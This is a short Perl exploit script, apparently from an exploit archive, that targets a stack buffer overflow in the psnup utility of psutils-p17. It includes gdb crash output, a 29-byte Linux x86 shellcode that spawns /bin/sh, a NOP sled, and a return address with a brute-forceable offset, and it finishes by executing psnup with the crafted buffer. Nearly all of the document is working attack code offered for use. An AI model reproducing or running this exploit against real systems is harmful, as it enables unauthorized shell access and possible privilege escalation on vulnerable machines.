#!/usr/bin/perl # PostScript Utilities - psnup (all the utilities of the package are vulnerable) * # * # written by lammat just for practice purposes * # tested against psutils-p17 * # (gdb) r -8 `perl -e 'print "A"x250'` * # The program being debugged has been started already. * # Start it from the beginning? (y or n) y * # Starting program: /usr/bin/psnup -8 `perl -e 'print "A"x250'` * # (no debugging symbols found).../usr/bin/psnup: can't open input file * # AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... * # * # Program received signal SIGSEGV, Segmentation fault. * # 0x41414141 in ?? () * # execve(/bin/sh) for linux x86 # 29 bytes # by Matias Sedalo $shellcode = "\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68". "\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; $len = 250; $ret = 0xbffff3a0; $nop = "\x90"; $oops="/usr/bin/psnup"; $offset = 900; # offset bruteforce purposes below if (@ARGV == 1) { $offset = $ARGV[0];} for ($i=0; $i<($len-length($shellcode)-100);$i++) {$buffer .= $nop; } $buffer .= $shellcode; print ("Address: 0x",sprintf('%lx',($ret + $offset)),"\n"); $new_ret = pack('l',($ret + $offset)); until(length($buffer)==$len) { $buffer.=$new_ret; } exec("$oops -8 $buffer");